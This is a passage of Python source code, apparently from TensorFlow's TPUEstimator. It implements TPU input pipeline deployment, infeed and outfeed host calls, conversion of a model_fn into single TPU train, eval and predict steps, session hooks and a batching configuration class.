self._feature_structure['signals'] = signals
return data_nest.flatten(self._feature_structure)
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
unflattened_inputs = data_nest.pack_sequence_as(self._feature_structure,
flattened_inputs)
features = unflattened_inputs['features']
self.tensor_packer.maybe_split_features(features)
return _Inputs(
features,
unflattened_inputs.get('labels'),
signals=unflattened_inputs.get('signals'))
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder(
ctx.input_partition_dims)
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# While tf.while_loop is called, the body function, which invokes
# `enqueue_fn` passed in, is called to construct the graph. So, input_fn
# structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_dataset_initializers = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
# Invoke input pipeline for each core and placed on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder,
host_device, host_id))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
elif self._ctx.is_input_broadcast_with_iterators():
# Only calls input_fn in host 0.
host_device = tpu_host_placement_fn(host_id=0)
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_broadcast_enqueue_ops_fn(self._ctx, self._input_fn,
self._inputs_structure_recorder,
num_hosts))
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
else:
# This branch handles two senarios:
# num_cores_per_replica > num_cores_per_host
# and num_cores_per_replica <= num_cores_per_host
# First, get the set of host_ids, by iterating replicas.
# We only want and will get the set of *unique* host_ids
# *that will call input_fn*. For each replica, we only call the input_fn
# from the CPU host that contains logical core 0.
host_device_ids = set()
for replica_id in xrange(self._ctx.num_replicas):
host_device, _ = self._ctx.device_for_replica(replica_id)
# TODO(lehou): Get host_id in a better way.
host_id = int(host_device.split('/task:')[1].split('/device:')[0])
host_device_ids.add(host_id)
for host_id in host_device_ids:
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id))
else:
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
# NOTE(xiejw): We dispatch here based on the return type of the
# users `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should be always safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
# infeed_queue is used to generate dequeue ops. The only thing it uses for
# dequeue is dtypes and types. So, any one can be used. Here, grab the
# first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, [
util_lib.MultiHostDatasetInitializerHook(all_dataset_initializers)
], run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
"""Validates the input pipeline.
Perform some sanity checks to log user friendly information. We should
error out to give users better error message. But, if
_WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
user code, so, log a warning.
Raises:
RuntimeError: If the validation failed.
"""
if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/guide/datasets for '
'instructions.')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
def call_computation(computation_inputs,
computation,
batch_config=None):
"""Call computation.
Args:
computation_inputs: A tensor or dict of tensors, the inputs to the
computation.
computation: A Python function that takes no inputs and builds computation
graph. If `computation` returns m outputs, this function will return a
list of m Tensors.
batch_config: A BatchConfig named tuple specifying the batching
configuration to use for inference batching.
Returns:
A list of output tensors.
"""
# Using `TPUPartitionedCall` makes it possible to target a different
# TPU core with every `Session.run()` call. Note that the entire inference
# graph executes on a single core, and that invocations of this graph
# will round-robin among the cores attached to a host.
def tpu_partitioned_call(partition_inputs):
# capture_resource_var_by_value enables variables to be mirrored on TPU
# to avoid fetching from CPU, since variables do not change during
# inference.
@function.Defun(capture_resource_var_by_value=False)
def tpu_subgraph():
return computation(partition_inputs)
return tpu_functional.TPUPartitionedCall(
args=tpu_subgraph.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_subgraph.definition.signature.output_arg],
f=tpu_subgraph)
# Not using Batching Function but use TPUPartitionedCall/all cores.
if not batch_config:
return tpu_partitioned_call(computation_inputs)
# Use Batching Function and TPUPartitionedCall/all cores.
# Note that BatchingFunction requires a list of tensors and doesn't support
# a dict of tensors. So we preserve the structure by deterministically
# flattening the dict before batching and then recomposing it after batching
# to feed into the computation.
ordered_inputs_list = nest.flatten(computation_inputs)
@batch_ops.batch_function(
num_batch_threads=batch_config.num_batch_threads,
max_batch_size=batch_config.max_batch_size,
batch_timeout_micros=batch_config.batch_timeout_micros,
allowed_batch_sizes=batch_config.allowed_batch_sizes,
max_enqueued_batches=batch_config.max_enqueued_batches,
autograph=False)
def batched_tpu_computation(*tensor_args):
"""Recompose the input feature dict and calls the TPU computation."""
computation_feature_input = nest.pack_sequence_as(computation_inputs,
tensor_args)
return tpu_partitioned_call(computation_feature_input)
return batched_tpu_computation(*ordered_inputs_list)
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
This makes calling model_fn on CPU and TPU easier and more consistent and
performs necessary check and mutation required by TPU training and evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def _add_embedding_features(self, features, hook_dummy_table_variables):
"""Add embedding features, optionally add hook to intercept gradient."""
if self._ctx.embedding_config:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
embedding_activations = tpu_embedding_.get_activations()
if hook_dummy_table_variables:
new_embedding_activations = (
tpu_embedding_gradient.hook_dummy_table_variables_to_activations(
tpu_embedding_, embedding_activations,
self._ctx.embedding_config.dummy_table_variables))
features.update(new_embedding_activations)
else:
features.update(embedding_activations)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input should be taken from TPU infeed rather
than input pipeline (input_fn) directly. To fit TPU loop and replicate
pattern, the original train computation should be reformed, which is the
returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of train_fn, host_calls, and captured scaffold_fn. The train_fn
representing the train step for TPU.
"""
host_call = _OutfeedHostCall(
self._ctx, outfeed_every_n_steps=self._config.tpu_config
.experimental_host_call_every_n_steps)
captured_scaffold_fn = _CapturedObject()
captured_training_hooks = _CapturedObject()
def train_step(step):
"""Training step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, True)
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if tensor_tracer.TensorTracer.is_enabled():
tt = tensor_tracer.TensorTracer()
loss = tt.trace_tpu(ops.get_default_graph(), loss, train_op,
self._ctx.num_replicas)
tracer_host_call = tt.host_call_deps_and_fn()
else:
tracer_host_call = {}
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
captured_training_hooks.capture(estimator_spec.training_hooks)
if self._ctx.embedding_config is None:
apply_sparse_grads = []
else:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
gradients = (
tpu_embedding_gradient.get_gradients_through_dummy_table_variables(
tpu_embedding_)
)
grad_multiplier = self._ctx.embedding_config.get_grad_multiplier()
if grad_multiplier is not None:
scaled_gradients = collections.OrderedDict(
(k, v * grad_multiplier) for k, v in six.iteritems(gradients))
else:
scaled_gradients = gradients
apply_sparse_grads = [
tpu_embedding_.generate_send_gradients_op(scaled_gradients)
]
# We must run train_op to update the variables prior to running the
# outfeed.
with ops.control_dependencies([train_op] + apply_sparse_grads):
host_call_outfeed_ops = []
host_call_fn, host_call_args = None, []
if (isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec) # pylint: disable=protected-access
and estimator_spec.host_call is not None):
host_call_fn, host_call_args = estimator_spec.host_call
if host_call_fn:
# Ignore dummy hostcalls (no arguments)
if host_call_args:
tracer_host_call.update({'host_call': estimator_spec.host_call})
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
else:
# Create a host call for the loss to track execution progress
# Without this, we don't have any indication of the state of the
# TPU program.
tracer_host_call.update({
'host_call': (lambda loss_t: loss_t,
[array_ops.reshape(loss, [1])])
})
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
with ops.control_dependencies(host_call_outfeed_ops):
return array_ops.identity(loss)
return (train_step, host_call, captured_scaffold_fn,
captured_training_hooks)
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
For TPU evaluation, a eval (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input and output are slightly different. Input,
features and labels, should be taken from TPU infeed rather than input
pipeline (input_fn) directly. Output is managed in two stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
To fit TPU evaluation pattern, the original eval computation should be
reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of eval_fn, host_calls, and captured scaffold_fn. The eval_fn
representing the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_eval_hooks = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, False)
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_eval_hooks.capture(tpu_estimator_spec.evaluation_hooks)
to_record = {}
if tpu_estimator_spec.eval_metrics:
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return math_ops.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of predict_fn, host_calls, and captured scaffold_fn. The
predict_fn representing the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_predict_hooks = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU prediction must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions)
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_predict_hooks.capture(tpu_estimator_spec.prediction_hooks)
to_record = {}
identity_fn = lambda **kwargs: kwargs
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return (predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks)
def _verify_tpu_spec_predictions(self, predictions):
"""Validates TPUEstimatorSpec.predictions dict."""
# TODO(xiejw): Adds validation for prediction dictionrary.
# TODO(xiejw): Adds support for single tensor as predictions.
if not isinstance(predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
for (key, tensor) in predictions.items():
if tensor.shape.dims[0].value is None:
raise ValueError(
'The tensor with key ({}) in TPUEstimatorSpec.predictions has '
'dynamic shape (should be static). Tensor: {}'.format(key, tensor))
return predictions
def _validate_model_features_and_labels(self, features, labels,
is_export_mode):
"""Validates that the features and labels for the model function are valid.
A valid features/labels object is the one with:
- Type: A tensor or any nested structure of tensors supported by TF nest,
namely nested dictionary, tuple, namedtuple, or sequence of tensors.
- Static shape if is_export_mode is False.
Args:
features: the features that would be input to the model function.
labels: the labels that would be input to the model function.
is_export_mode: boolean value specifying if in export mode.
Raises:
TypeError: If features/labels are not of the correct type.
ValueError: If features/labels have dynamic shape.
"""
def validate(obj, obj_name):
"""Helper validate function."""
if is_export_mode or self._ctx.is_running_on_cpu(is_export_mode):
return
if isinstance(obj, ops.Tensor):
if not obj.get_shape().is_fully_defined():
raise ValueError(
'The {} to the model returned by input_fn must have static shape.'
' Tensor: {}'.format(obj_name, obj))
else:
for tensor in data_nest.flatten(obj):
if not tensor.get_shape().is_fully_defined():
raise ValueError(
('The {} to the model returned by input_fn must have static '
'shape. Tensor: {}').format(obj_name, tensor))
validate(features, 'features')
if labels is not None:
validate(labels, 'labels')
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
self._validate_model_features_and_labels(features, labels, is_export_mode)
model_fn_args = function_utils.fn_args(self._model_fn)
kwargs = {}
# Makes deep copy with `config` and params` in case user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
_add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn)
running_on_cpu = self._ctx.is_running_on_cpu(is_export_mode)
# In export mode, params['use_tpu'] has already been set based on mode
# (i.e. True for _REWRITE_FOR_INFERENCE_MODE, False otherwise).
if not is_export_mode:
_add_item_to_params(params, _USE_TPU_KEY, not running_on_cpu)
if not running_on_cpu:
user_context = tpu_context.TPUContext(
internal_ctx=self._ctx, call_from_input_fn=False)
_add_item_to_params(params, _CTX_KEY, user_context)
estimator_spec = self._model_fn(features=features, **kwargs)
if (running_on_cpu and
isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)): # pylint: disable=protected-access
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`.
return estimator_spec.as_estimator_spec()
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(
err_msg.format('training_chief_hooks') + 'If you want' +
' to pass training hooks, please pass via training_hooks.')
if estimator_spec.scaffold:
logging.warning('EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx, outfeed_every_n_steps=1):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
self._outfeed_every_n_steps = outfeed_every_n_steps
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = function_utils.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self, step=None):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
if self._outfeed_every_n_steps > 1 and step is None:
raise ValueError('If outfeed is requested every n steps, you must pass '
'a tensor whose value is the step number within the '
'current training loop.')
with ops.device(tpu.core(0)):
if self._outfeed_every_n_steps == 1:
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
else:
return [control_flow_ops.cond(
math_ops.equal(math_ops.mod(step, self._outfeed_every_n_steps), 0),
lambda: tpu_ops.outfeed_enqueue_tuple(tensors),
lambda: control_flow_ops.no_op())]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
across all shards. The concatenated function is passed to the host_fn and
executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return {}
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
# constraint it such that we have at most one outfeed dequeue and enqueue
# per replica.
for i in xrange(self._ctx.num_replicas):
host_device, ordinal_id = self._ctx.device_for_replica(i)
with ops.device(host_device):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal_id)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
flat_dequeue_ops = []
for l in dequeue_ops:
flat_dequeue_ops.extend(l)
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos +
len(self._tensors[name])]
pos += len(self._tensors[name])
def _call_host_fn(fn, *args, **kw):
context = CatchInvalidHostcallFunctions()
context.Enter()
result = fn(*args, **kw)
context.Exit()
context.ExitResult(result)
return result
# It is assumed evaluation always happens on single host TPU system. So,
# place all ops on tpu host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with ops.device(self._ctx.tpu_host_placement_function(replica_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
# TODO(xiejw): Make the specification of the outfeed combinaton
# function more explicit and well-documented. We may want to give the
# user the option of concatenating along any axis.
if (self._ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST):
# If the infeed is in BROADCAST mode (each core recieving the same
# input), then we assume that the cores also produce identical
# copies of the same output, and we simply take the output from
# the first core. This mode is used by Mesh-TensorFlow.
with ops.control_dependencies(dequeue_ops[i]):
dequeue_ops[i] = array_ops.identity(dequeue_ops[i][0])
else:
# Assume that the input has been batch-split and that axis 0 of the
# output tensors represents the batch size. Concatenate along
# the axis 0 to re-combine the batch.
dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = _call_host_fn(self._host_fns[name], **dequeue_ops)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
else:
ret[name] = _call_host_fn(self._host_fns[name], *dequeue_ops)
# force all dequeue operations to be run if not consumed by the host calls
ret['__force_dequeue'] = control_flow_ops.group(*flat_dequeue_ops)
return ret
class _OutfeedHostCallHook(session_run_hook.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return basic_session_run_hooks.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook):
"""Calculate and report global_step/sec and examples/sec during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
global_step_per_sec = elapsed_steps / elapsed_time
examples_per_sec = self._batch_size * global_step_per_sec
if self._summary_writer is not None:
global_step_summary = Summary(value=[
Summary.Value(tag='global_step/sec', simple_value=global_step_per_sec)
])
example_summary = Summary(value=[
Summary.Value(tag='examples/sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(global_step_summary, global_step)
self._summary_writer.add_summary(example_summary, global_step)
logging.info('global_step/sec: %g', global_step_per_sec)
logging.info('examples/sec: %g', examples_per_sec)
class InstallSignalHandlerHook(session_run_hook.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class ExportSavedModelApiVersion(enum.Enum):
V1 = 1
V2 = 2
class BatchConfig(
collections.namedtuple('BatchConfig', [
'num_batch_threads', 'max_batch_size', 'batch_timeout_micros',
'allowed_batch_sizes', 'max_enqueued_batches'
])):
"""Class to handle config inputs into the batching function."""
def __new__(cls,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes,
max_enqueued_batches=10):
"""Creates an BatchConfig instance.
Args:
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op
to pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to
10.
Returns:
An BatchConfig instance.
"""
return super(BatchConfig, cls).__new__(
cls,
num_batch_threads=num_batch_threads,
max_batch_size=max_batch_size,
batch_timeout_micros=batch_timeout_micros,
allowed_batch_sizes=allowed_batch_sizes,
